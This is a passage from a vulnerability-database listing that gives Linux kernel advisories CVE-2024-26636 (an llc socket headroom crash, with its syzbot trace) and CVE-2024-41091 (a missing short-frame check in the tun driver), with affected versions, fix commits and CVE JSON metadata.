: 0000000000000000 x5 : 0000000000000001 x4 : 0000000000000001 x3 : ffff800082b78714 x2 : 0000000000000001 x1 : 0000000100000000 x0 : 0000000000000089 Call trace: skb_panic net/core/skbuff.c:189 [inline] skb_under_panic+0x13c/0x140 net/core/skbuff.c:203 skb_push+0xf0/0x108 net/core/skbuff.c:2451 eth_header+0x44/0x1f8 net/ethernet/eth.c:83 dev_hard_header include/linux/netdevice.h:3188 [inline] llc_mac_hdr_init+0x110/0x17c net/llc/llc_output.c:33 llc_sap_action_send_xid_c+0x170/0x344 net/llc/llc_s_ac.c:85 llc_exec_sap_trans_actions net/llc/llc_sap.c:153 [inline] llc_sap_next_state net/llc/llc_sap.c:182 [inline] llc_sap_state_process+0x1ec/0x774 net/llc/llc_sap.c:209 llc_build_and_send_xid_pkt+0x12c/0x1c0 net/llc/llc_sap.c:270 llc_ui_sendmsg+0x7bc/0xb1c net/llc/af_llc.c:997 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg net/socket.c:745 [inline] sock_sendmsg+0x194/0x274 net/socket.c:767 splice_to_socket+0x7cc/0xd58 fs/splice.c:881 do_splice_from fs/splice.c:933 [inline] direct_splice_actor+0xe4/0x1c0 fs/splice.c:1142 splice_direct_to_actor+0x2a0/0x7e4 fs/splice.c:1088 do_splice_direct+0x20c/0x348 fs/splice.c:1194 do_sendfile+0x4bc/0xc70 fs/read_write.c:1254 __do_sys_sendfile64 fs/read_write.c:1322 [inline] __se_sys_sendfile64 fs/read_write.c:1308 [inline] __arm64_sys_sendfile64+0x160/0x3b4 fs/read_write.c:1308 __invoke_syscall arch/arm64/kernel/syscall.c:37 [inline] invoke_syscall+0x98/0x2b8 arch/arm64/kernel/syscall.c:51 el0_svc_common+0x130/0x23c arch/arm64/kernel/syscall.c:136 do_el0_svc+0x48/0x58 arch/arm64/kernel/syscall.c:155 el0_svc+0x54/0x158 arch/arm64/kernel/entry-common.c:678 el0t_64_sync_handler+0x84/0xfc arch/arm64/kernel/entry-common.c:696 el0t_64_sync+0x190/0x194 arch/arm64/kernel/entry.S:595 Code: aa1803e6 aa1903e7 a90023f5 94792f6a (d4210000)

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/84e9d10419f6f4f3f…
	https://git.kernel.org/stable/c/b643d0defcbacd7fe…
	https://git.kernel.org/stable/c/04f2a74b562f3a749…
	https://git.kernel.org/stable/c/c22044270da688810…
	https://git.kernel.org/stable/c/6d53b813ff8b177f8…
	https://git.kernel.org/stable/c/cafd3ad3fe03ef4d6…
	https://git.kernel.org/stable/c/c451c008f563d56d5…
	https://git.kernel.org/stable/c/dad555c816a50c6a6…

Impacted products

Vendor

Product

Version

Linux

Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 84e9d10419f6f4f3f3cd8f9aaf44a48719aa4b1b (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < b643d0defcbacd7fe548bc65c3e4e6f17dc5eb2d (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 04f2a74b562f3a7498be0399309669f342793d8c (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < c22044270da68881074fda81a7d34812726cb249 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 6d53b813ff8b177f86f149c2f744442681f720e4 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < cafd3ad3fe03ef4d6632747be9ee15dc0029db4b (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < c451c008f563d56d5e676c9dcafae565fcad84bb (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < dad555c816a50c6a6a8a86be1f9177673918c647 (git)

Linux

Affected: 2.6.12
Unaffected: 0 , < 2.6.12 (semver)
Unaffected: 4.19.307 , ≤ 4.19.* (semver)
Unaffected: 5.4.269 , ≤ 5.4.* (semver)
Unaffected: 5.10.210 , ≤ 5.10.* (semver)
Unaffected: 5.15.149 , ≤ 5.15.* (semver)
Unaffected: 6.1.76 , ≤ 6.1.* (semver)
Unaffected: 6.6.15 , ≤ 6.6.* (semver)
Unaffected: 6.7.3 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26636",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-03-18T15:30:36.675601Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:49:11.012Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:07:19.780Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/84e9d10419f6f4f3f3cd8f9aaf44a48719aa4b1b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b643d0defcbacd7fe548bc65c3e4e6f17dc5eb2d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/04f2a74b562f3a7498be0399309669f342793d8c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c22044270da68881074fda81a7d34812726cb249"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6d53b813ff8b177f86f149c2f744442681f720e4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cafd3ad3fe03ef4d6632747be9ee15dc0029db4b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c451c008f563d56d5e676c9dcafae565fcad84bb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dad555c816a50c6a6a8a86be1f9177673918c647"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/llc/af_llc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "84e9d10419f6f4f3f3cd8f9aaf44a48719aa4b1b",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "b643d0defcbacd7fe548bc65c3e4e6f17dc5eb2d",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "04f2a74b562f3a7498be0399309669f342793d8c",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "c22044270da68881074fda81a7d34812726cb249",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "6d53b813ff8b177f86f149c2f744442681f720e4",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "cafd3ad3fe03ef4d6632747be9ee15dc0029db4b",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "c451c008f563d56d5e676c9dcafae565fcad84bb",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "dad555c816a50c6a6a8a86be1f9177673918c647",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/llc/af_llc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.12"
            },
            {
              "lessThan": "2.6.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.307",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.269",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.210",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.149",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.76",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.15",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.307",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.269",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.210",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.149",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.76",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.15",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.3",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nllc: make llc_ui_sendmsg() more robust against bonding changes\n\nsyzbot was able to trick llc_ui_sendmsg(), allocating an skb with no\nheadroom, but subsequently trying to push 14 bytes of Ethernet header [1]\n\nLike some others, llc_ui_sendmsg() releases the socket lock before\ncalling sock_alloc_send_skb().\nThen it acquires it again, but does not redo all the sanity checks\nthat were performed.\n\nThis fix:\n\n- Uses LL_RESERVED_SPACE() to reserve space.\n- Check all conditions again after socket lock is held again.\n- Do not account Ethernet header for mtu limitation.\n\n[1]\n\nskbuff: skb_under_panic: text:ffff800088baa334 len:1514 put:14 head:ffff0000c9c37000 data:ffff0000c9c36ff2 tail:0x5dc end:0x6c0 dev:bond0\n\n kernel BUG at net/core/skbuff.c:193 !\nInternal error: Oops - BUG: 00000000f2000800 [#1] PREEMPT SMP\nModules linked in:\nCPU: 0 PID: 6875 Comm: syz-executor.0 Not tainted 6.7.0-rc8-syzkaller-00101-g0802e17d9aca-dirty #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/17/2023\npstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : skb_panic net/core/skbuff.c:189 [inline]\n pc : skb_under_panic+0x13c/0x140 net/core/skbuff.c:203\n lr : skb_panic net/core/skbuff.c:189 [inline]\n lr : skb_under_panic+0x13c/0x140 net/core/skbuff.c:203\nsp : ffff800096f97000\nx29: ffff800096f97010 x28: ffff80008cc8d668 x27: dfff800000000000\nx26: ffff0000cb970c90 x25: 00000000000005dc x24: ffff0000c9c36ff2\nx23: ffff0000c9c37000 x22: 00000000000005ea x21: 00000000000006c0\nx20: 000000000000000e x19: ffff800088baa334 x18: 1fffe000368261ce\nx17: ffff80008e4ed000 x16: ffff80008a8310f8 x15: 0000000000000001\nx14: 1ffff00012df2d58 x13: 0000000000000000 x12: 0000000000000000\nx11: 0000000000000001 x10: 0000000000ff0100 x9 : e28a51f1087e8400\nx8 : e28a51f1087e8400 x7 : ffff80008028f8d0 x6 : 0000000000000000\nx5 : 0000000000000001 x4 : 0000000000000001 x3 : ffff800082b78714\nx2 : 0000000000000001 x1 : 0000000100000000 x0 : 0000000000000089\nCall trace:\n  skb_panic net/core/skbuff.c:189 [inline]\n  skb_under_panic+0x13c/0x140 net/core/skbuff.c:203\n  skb_push+0xf0/0x108 net/core/skbuff.c:2451\n  eth_header+0x44/0x1f8 net/ethernet/eth.c:83\n  dev_hard_header include/linux/netdevice.h:3188 [inline]\n  llc_mac_hdr_init+0x110/0x17c net/llc/llc_output.c:33\n  llc_sap_action_send_xid_c+0x170/0x344 net/llc/llc_s_ac.c:85\n  llc_exec_sap_trans_actions net/llc/llc_sap.c:153 [inline]\n  llc_sap_next_state net/llc/llc_sap.c:182 [inline]\n  llc_sap_state_process+0x1ec/0x774 net/llc/llc_sap.c:209\n  llc_build_and_send_xid_pkt+0x12c/0x1c0 net/llc/llc_sap.c:270\n  llc_ui_sendmsg+0x7bc/0xb1c net/llc/af_llc.c:997\n  sock_sendmsg_nosec net/socket.c:730 [inline]\n  __sock_sendmsg net/socket.c:745 [inline]\n  sock_sendmsg+0x194/0x274 net/socket.c:767\n  splice_to_socket+0x7cc/0xd58 fs/splice.c:881\n  do_splice_from fs/splice.c:933 [inline]\n  direct_splice_actor+0xe4/0x1c0 fs/splice.c:1142\n  splice_direct_to_actor+0x2a0/0x7e4 fs/splice.c:1088\n  do_splice_direct+0x20c/0x348 fs/splice.c:1194\n  do_sendfile+0x4bc/0xc70 fs/read_write.c:1254\n  __do_sys_sendfile64 fs/read_write.c:1322 [inline]\n  __se_sys_sendfile64 fs/read_write.c:1308 [inline]\n  __arm64_sys_sendfile64+0x160/0x3b4 fs/read_write.c:1308\n  __invoke_syscall arch/arm64/kernel/syscall.c:37 [inline]\n  invoke_syscall+0x98/0x2b8 arch/arm64/kernel/syscall.c:51\n  el0_svc_common+0x130/0x23c arch/arm64/kernel/syscall.c:136\n  do_el0_svc+0x48/0x58 arch/arm64/kernel/syscall.c:155\n  el0_svc+0x54/0x158 arch/arm64/kernel/entry-common.c:678\n  el0t_64_sync_handler+0x84/0xfc arch/arm64/kernel/entry-common.c:696\n  el0t_64_sync+0x190/0x194 arch/arm64/kernel/entry.S:595\nCode: aa1803e6 aa1903e7 a90023f5 94792f6a (d4210000)"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:52:48.420Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/84e9d10419f6f4f3f3cd8f9aaf44a48719aa4b1b"
        },
        {
          "url": "https://git.kernel.org/stable/c/b643d0defcbacd7fe548bc65c3e4e6f17dc5eb2d"
        },
        {
          "url": "https://git.kernel.org/stable/c/04f2a74b562f3a7498be0399309669f342793d8c"
        },
        {
          "url": "https://git.kernel.org/stable/c/c22044270da68881074fda81a7d34812726cb249"
        },
        {
          "url": "https://git.kernel.org/stable/c/6d53b813ff8b177f86f149c2f744442681f720e4"
        },
        {
          "url": "https://git.kernel.org/stable/c/cafd3ad3fe03ef4d6632747be9ee15dc0029db4b"
        },
        {
          "url": "https://git.kernel.org/stable/c/c451c008f563d56d5e676c9dcafae565fcad84bb"
        },
        {
          "url": "https://git.kernel.org/stable/c/dad555c816a50c6a6a8a86be1f9177673918c647"
        }
      ],
      "title": "llc: make llc_ui_sendmsg() more robust against bonding changes",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26636",
    "datePublished": "2024-03-18T10:14:47.795Z",
    "dateReserved": "2024-02-19T14:20:24.136Z",
    "dateUpdated": "2025-05-04T08:52:48.420Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-41091 (GCVE-0-2024-41091)

Vulnerability from cvelistv5 – Published: 2024-07-29 06:18 – Updated: 2025-11-03 22:00

Title

tun: add missing verification for short frame

Summary

In the Linux kernel, the following vulnerability has been resolved: tun: add missing verification for short frame The cited commit missed to check against the validity of the frame length in the tun_xdp_one() path, which could cause a corrupted skb to be sent downstack. Even before the skb is transmitted, the tun_xdp_one-->eth_type_trans() may access the Ethernet header although it can be less than ETH_HLEN. Once transmitted, this could either cause out-of-bound access beyond the actual length, or confuse the underlayer with incorrect or inconsistent header length in the skb metadata. In the alternative path, tun_get_user() already prohibits short frame which has the length less than Ethernet header size from being transmitted for IFF_TAP. This is to drop any frame shorter than the Ethernet header size just like how tun_get_user() does. CVE: CVE-2024-41091

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/32b0aaba5dbc85816…
	https://git.kernel.org/stable/c/6100e023720489026…
	https://git.kernel.org/stable/c/589382f50b4a5d90d…
	https://git.kernel.org/stable/c/ad6b3f622ccfb4bfe…
	https://git.kernel.org/stable/c/d5ad89b7d01ed4e66…
	https://git.kernel.org/stable/c/a9d1c27e2ee3b0ea5…
	https://git.kernel.org/stable/c/8418f55302fa1d2ee…
	https://git.kernel.org/stable/c/049584807f1d797fc…

Impacted products

Vendor

Product

Version

Linux

Affected: 043d222f93ab8c76b56a3b315cd8692e35affb6c , < 32b0aaba5dbc85816898167d9b5d45a22eae82e9 (git)
Affected: 043d222f93ab8c76b56a3b315cd8692e35affb6c , < 6100e0237204890269e3f934acfc50d35fd6f319 (git)
Affected: 043d222f93ab8c76b56a3b315cd8692e35affb6c , < 589382f50b4a5d90d16d8bc9dcbc0e927a3e39b2 (git)
Affected: 043d222f93ab8c76b56a3b315cd8692e35affb6c , < ad6b3f622ccfb4bfedfa53b6ebd91c3d1d04f146 (git)
Affected: 043d222f93ab8c76b56a3b315cd8692e35affb6c , < d5ad89b7d01ed4e66fd04734fc63d6e78536692a (git)
Affected: 043d222f93ab8c76b56a3b315cd8692e35affb6c , < a9d1c27e2ee3b0ea5d40c105d6e728fc114470bb (git)
Affected: 043d222f93ab8c76b56a3b315cd8692e35affb6c , < 8418f55302fa1d2eeb73e16e345167e545c598a5 (git)
Affected: 043d222f93ab8c76b56a3b315cd8692e35affb6c , < 049584807f1d797fc3078b68035450a9769eb5c3 (git)

Linux

Affected: 4.20
Unaffected: 0 , < 4.20 (semver)
Unaffected: 5.4.281 , ≤ 5.4.* (semver)
Unaffected: 5.10.223 , ≤ 5.10.* (semver)
Unaffected: 5.15.164 , ≤ 5.15.* (semver)
Unaffected: 6.1.102 , ≤ 6.1.* (semver)
Unaffected: 6.6.43 , ≤ 6.6.* (semver)
Unaffected: 6.9.12 , ≤ 6.9.* (semver)
Unaffected: 6.10.2 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:00:47.849Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/32b0aaba5dbc85816898167d9b5d45a22eae82e9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6100e0237204890269e3f934acfc50d35fd6f319"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/589382f50b4a5d90d16d8bc9dcbc0e927a3e39b2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ad6b3f622ccfb4bfedfa53b6ebd91c3d1d04f146"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d5ad89b7d01ed4e66fd04734fc63d6e78536692a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a9d1c27e2ee3b0ea5d40c105d6e728fc114470bb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8418f55302fa1d2eeb73e16e345167e545c598a5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/049584807f1d797fc3078b68035450a9769eb5c3"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41091",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:24:56.109252Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:06.194Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/tun.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "32b0aaba5dbc85816898167d9b5d45a22eae82e9",
              "status": "affected",
              "version": "043d222f93ab8c76b56a3b315cd8692e35affb6c",
              "versionType": "git"
            },
            {
              "lessThan": "6100e0237204890269e3f934acfc50d35fd6f319",
              "status": "affected",
              "version": "043d222f93ab8c76b56a3b315cd8692e35affb6c",
              "versionType": "git"
            },
            {
              "lessThan": "589382f50b4a5d90d16d8bc9dcbc0e927a3e39b2",
              "status": "affected",
              "version": "043d222f93ab8c76b56a3b315cd8692e35affb6c",
              "versionType": "git"
            },
            {
              "lessThan": "ad6b3f622ccfb4bfedfa53b6ebd91c3d1d04f146",
              "status": "affected",
              "version": "043d222f93ab8c76b56a3b315cd8692e35affb6c",
              "versionType": "git"
            },
            {
              "lessThan": "d5ad89b7d01ed4e66fd04734fc63d6e78536692a",
              "status": "affected",
              "version": "043d222f93ab8c76b56a3b315cd8692e35affb6c",
              "versionType": "git"
            },
            {
              "lessThan": "a9d1c27e2ee3b0ea5d40c105d6e728fc114470bb",
              "status": "affected",
              "version": "043d222f93ab8c76b56a3b315cd8692e35affb6c",
              "versionType": "git"
            },
            {
              "lessThan": "8418f55302fa1d2eeb73e16e345167e545c598a5",
              "status": "affected",
              "version": "043d222f93ab8c76b56a3b315cd8692e35affb6c",
              "versionType": "git"
            },
            {
              "lessThan": "049584807f1d797fc3078b68035450a9769eb5c3",
              "status": "affected",
              "version": "043d222f93ab8c76b56a3b315cd8692e35affb6c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/tun.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.20"
            },
            {
              "lessThan": "4.20",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.281",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.223",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.164",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.102",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.43",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.281",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.223",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.164",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.102",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.43",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.12",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.2",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntun: add missing verification for short frame\n\nThe cited commit missed to check against the validity of the frame length\nin the tun_xdp_one() path, which could cause a corrupted skb to be sent\ndownstack. Even before the skb is transmitted, the\ntun_xdp_one--\u003eeth_type_trans() may access the Ethernet header although it\ncan be less than ETH_HLEN. Once transmitted, this could either cause\nout-of-bound access beyond the actual length, or confuse the underlayer\nwith incorrect or inconsistent header length in the skb metadata.\n\nIn the alternative path, tun_get_user() already prohibits short frame which\nhas the length less than Ethernet header size from being transmitted for\nIFF_TAP.\n\nThis is to drop any frame shorter than the Ethernet header size just like\nhow tun_get_user() does.\n\nCVE: CVE-2024-41091"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:21:53.092Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/32b0aaba5dbc85816898167d9b5d45a22eae82e9"
        },
        {
          "url": "https://git.kernel.org/stable/c/6100e0237204890269e3f934acfc50d35fd6f319"
        },
        {
          "url": "https://git.kernel.org/stable/c/589382f50b4a5d90d16d8bc9dcbc0e927a3e39b2"
        },
        {
          "url": "https://git.kernel.org/stable/c/ad6b3f622ccfb4bfedfa53b6ebd91c3d1d04f146"
        },
        {
          "url": "https://git.kernel.org/stable/c/d5ad89b7d01ed4e66fd04734fc63d6e78536692a"
        },
        {
          "url": "https://git.kernel.org/stable/c/a9d1c27e2ee3b0ea5d40c105d6e728fc114470bb"
        },
        {
          "url": "https://git.kernel.org/stable/c/8418f55302fa1d2eeb73e16e345167e545c598a5"
        },
        {
          "url": "https://git.kernel.org/stable/c/049584807f1d797fc3078b68035450a9769eb5c3"
        }
      ],
      "title": "tun: add missing verification for short frame",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41091",
